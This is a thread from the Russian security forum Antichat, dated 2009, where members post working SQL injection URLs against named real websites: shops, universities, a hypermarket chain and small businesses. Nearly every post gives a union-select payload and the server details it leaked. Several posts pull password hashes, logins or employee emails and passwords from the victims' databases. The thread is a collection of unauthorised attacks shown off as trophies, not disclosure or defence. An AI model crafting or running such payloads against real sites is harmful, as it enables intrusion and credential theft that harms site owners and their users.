ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #11121  
Старый 03.11.2009, 23:44
Dyxxx
Участник форума
Регистрация: 16.02.2009
Сообщений: 191
Провел на форуме:
879928

Репутация: 438
По умолчанию

Formel3.de pr4
ATS Formel 3 Cup
Код:
http://www.formel3.de/news.php
?id=null+union+select+null,concat_ws(char(32,124,32),version(),user(),database(),@@version_compile_os),null,null,null,null,null,null
4.1.22-standard-log | db161837_7@local2 | db161837_7 | pc-linux-gnu
 
Ответить с цитированием

  #11122  
Старый 03.11.2009, 23:45
Bb0y
Участник форума
Регистрация: 30.10.2009
Сообщений: 103
Провел на форуме:
736224

Репутация: 388
Отправить сообщение для Bb0y с помощью ICQ Отправить сообщение для Bb0y с помощью Yahoo
По умолчанию

Проезжая в автобусе решил чемнибудь заняться, а конкретно, тряхнуть стариной и поискать скули в постгре
http://www.vgihs.edu.in/popnews.php?nid=-4+union+select+usename||chr(58)||passwd+from+pg_us er+limit+1+offset+2--

http://www.vgihs.edu.in/popnews.php?nid=-4;select+cast(version()+as+int)--
PostgreSQL 8.0.8 on i386-redhat-linux-gnu, compiled by GCC i386-redhat-linux-gcc (GCC) 4.0.2 20051125 (Red Hat 4.0.2-8)

кста edu)
 
Ответить с цитированием

  #11123  
Старый 04.11.2009, 00:41
ILYAtirtir
Участник форума
Регистрация: 25.04.2007
Сообщений: 176
Провел на форуме:
1957988

Репутация: 739
Отправить сообщение для ILYAtirtir с помощью ICQ
По умолчанию

ГИПЕРМАРКЕТЫ «КАРУСЕЛЬ»

Цитата:
http://karusel.ru/personnel.php?city=-12+union+select+1,concat_ws(0x3a,database(),user() ,version())&all=12
Код:
karusel_www:karusel@localhost:5.0.45-log
 
Ответить с цитированием

  #11124  
Старый 04.11.2009, 01:59
nemaniak
Участник форума
Регистрация: 10.06.2008
Сообщений: 201
Провел на форуме:
1174919

Репутация: 229
По умолчанию

sweeto.co.uk PR-1

Код:
http://euwb.sweeto.co.uk/thread.php?threadid=-350+union+select+1,2,3,concat_ws(0x3a,version(),user(),database()),5,6,7,8+--+&page=3
Код:
5.0.82-community:web81-sweeto@localhost:web81-sweeto
stratfordboilerstoves.co.uk PR-3

Код:
http://www.stratfordboilerstoves.co.uk/online_spares.php?model=%27+union+select+concat_ws(0x3a,version(),user(),database()),2,3,4,5,6,7,8,9+--+
Код:
5.0.82-community:web100-aarrow@web43.extendcp.co.uk:web100-aarrow
shakies.co.uk PR-2

Код:
http://www.shakies.co.uk/vote/results.php?pollid=1%27+union+select+1,2,concat_ws(0x3a,version(),user(),database()),4,5+--+
Код:
5.0.82-community:web80-vote@localhost:web80-vote
 
Ответить с цитированием

  #11125  
Старый 04.11.2009, 12:31
DezMond™
Участник форума
Регистрация: 10.01.2008
Сообщений: 199
Провел на форуме:
961428

Репутация: 662
Отправить сообщение для DezMond™ с помощью ICQ
По умолчанию

http://www.katemagic.ru/index2.php?kind=-0+union+select+1,2,3,4,5,6,7,8,9,10,11+--+

http://www.assotecnicaofferte.it/pop.php?ID=-877+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14, 15,16,17,18,19+/*+

http://www.usefulandagreeable.com/magazine.php?id=-35'+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14, 15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31 ,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,4 8,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64, 65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81 ,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,9 8,99,100,101,102,103,104,105+/*+


http://www.nourhaikphoto.com/photos.php?groupe=144&album=-518+union+select+1,2,3,4,5,pass+from+user+/*+

http://livenloudmagazine.com/photos.php?groupe=95&album=-122+union+select+1,2,3,4,5,pass+from+user+/*+
 
Ответить с цитированием

  #11126  
Старый 04.11.2009, 13:26
Bb0y
Участник форума
Регистрация: 30.10.2009
Сообщений: 103
Провел на форуме:
736224

Репутация: 388
Отправить сообщение для Bb0y с помощью ICQ Отправить сообщение для Bb0y с помощью Yahoo
По умолчанию

На этот раз мускул
http://vmcenter.ru/newsdetail.php?id=-4+union+select+group_concat(0x0b,column_name)+from +information_schema.columns+where+table_name=0x757 3657273
MySQL 5.0.27
http://vmcenter.ru/newsdetail.php?id=-4+union+select+concat(0x0b,login,0x3a,password)+fr om+users
судя по всему эта таблица пуста
 
Ответить с цитированием

  #11127  
Старый 04.11.2009, 16:34
^YaHoo^
Banned
Регистрация: 02.01.2009
Сообщений: 29
Провел на форуме:
178075

Репутация: 85
Отправить сообщение для ^YaHoo^ с помощью ICQ
По умолчанию

институт МГИМО
Код:
http://www.miu.mgimo.ru/siteindex.php?page=38&mode=group&edtype=1&gradyear=9&specialty=&id=-16+union+select+concat_ws(0x3a,version(),database(),user(),@@version_compile_os),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31--
4.1.21-community-nt:mgimo_miu:mgimo_miu@localhost:Win32

Код:
http://education.centrinvest.ru/person.php?id=-1544704+union+select+1,2,3,4,5,6,7,8,9,10,11,12,concat_ws(0x3a,version(),database(),user(),@@version_compile_os),14,15,16,17--
5.0.70-log:edu:edu@localhost: pc-linux-gnu
 
Ответить с цитированием

  #11128  
Старый 04.11.2009, 23:10
Gorev
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944

Репутация: 1550


Отправить сообщение для Gorev с помощью ICQ Отправить сообщение для Gorev с помощью Yahoo
По умолчанию

view-source:

http://www.infotronica.ro/produs.php?id=-P:229-S:41+UNION+SELECT+1,2,concat_ws(0x3a,version(),dat abase(),user(),@@version_compile_os),4,5,6,7,8,9,1 0,11,12,13,14,15,16,17,18,19,20+limit+1,1

http://www.infotronica.ro/produs.php?id=-P:229-S:41+UNION+SELECT+1,2,CONCAT((SELECT+CONCAT_WS(0x3 a,Email,Parola,Nume)+FROM+tronica_infotr.angajati+ LIMIT+0,1)),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18 ,19,20+limit+1,1

Database Version: 5.0.81-community-log
Database name: tronica_infotr
User name: tronica_hogast@localhost
Os: unknown-linux-gnu
 
Ответить с цитированием

  #11129  
Старый 05.11.2009, 00:44
Ctacok
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
Провел на форуме:
5011696

Репутация: 2221


По умолчанию

Цитата:
http://www.echodelta.net/gaer/aerodrome.php4?id=-144+union+select+1,concat_ws(0x3c42523e,user(),dat abase(),version()),3,4,5,6,7,8,9,10,11,12,13,14,15 +--+
User: echodeltecho1@10.0.65.111
Database: echodeltecho1
Version: 4.0.25-standard-log
 
Ответить с цитированием

  #11130  
Старый 05.11.2009, 08:52
Ctacok
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
Провел на форуме:
5011696

Репутация: 2221


По умолчанию

Цитата:
http://www.bigrpromotions.com/view.php?postID=-364+union+select+1,2,3,4,concat_ws(0x3a,user(),dat abase(),version())+--+
User: mrgrim8888@72.167.232.203
Database: mrgrim8888
Version: 4.1.22-max-log

Цитата:
http://www.ad-titude.com/comments.php?postid=-140+union+select+1,2,concat_ws(0x3a,user(),databas e(),version()),4,5,6+--+
User: rene@ps12859.dreamhost.com
Database: content
Version: 5.0.67-userstats-log

Последний раз редактировалось Ctacok; 05.11.2009 в 08:58..
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 3 (пользователей: 0 , гостей: 3)
 


Быстрый переход




ANTICHAT.XYZ